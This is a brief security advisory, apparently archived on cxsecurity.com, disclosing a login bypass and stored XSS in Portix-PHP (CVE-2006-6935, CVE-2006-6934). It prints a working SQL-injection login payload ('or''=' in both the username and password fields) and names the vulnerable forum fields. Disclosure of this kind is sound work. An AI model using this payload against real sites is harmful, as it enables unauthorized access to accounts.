Bug: Portix-PHP [login bypass & xss (post)] ( Ascii Version )

Search:
WLB2

Portix-PHP [login bypass & xss (post)]

Published
Credit
Risk
2007.01.17
laurent gaffié & benjamin mossé
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-6935
CVE-2006-6934
No
Yes

product:Portix-PHP
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields :
titre
auteur

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version